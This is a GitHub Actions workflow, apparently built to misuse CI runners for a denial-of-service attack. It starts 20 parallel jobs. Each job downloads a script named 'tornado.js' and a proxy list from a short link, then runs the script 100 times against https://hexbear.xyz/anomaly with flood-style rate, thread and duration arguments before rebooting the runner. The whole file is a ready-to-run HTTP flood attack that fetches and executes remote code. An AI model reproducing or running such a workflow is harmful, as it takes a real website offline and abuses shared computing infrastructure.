name: Ubuntu VDS 50 saniye tor

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 25
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]

    steps:
      - name: Checkout
        uses: actions/checkout@v3

      - name: OK !
        run: |
          wget https://github.com/kaneious/tornado/raw/refs/heads/main/tornado.js
          wget https://curl.by/wtNFo/fres.txt
          npm i hpack
          chmod +x tornado.js
          PIDS=()
          for i in {1..100}; do
            timeout 70 node tornado.js GET https://hexbear.xyz/anomaly 65 32 90 fres.txt --full  --query 3
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: sleep 70
        
      - name: OK !
        run: sudo reboot
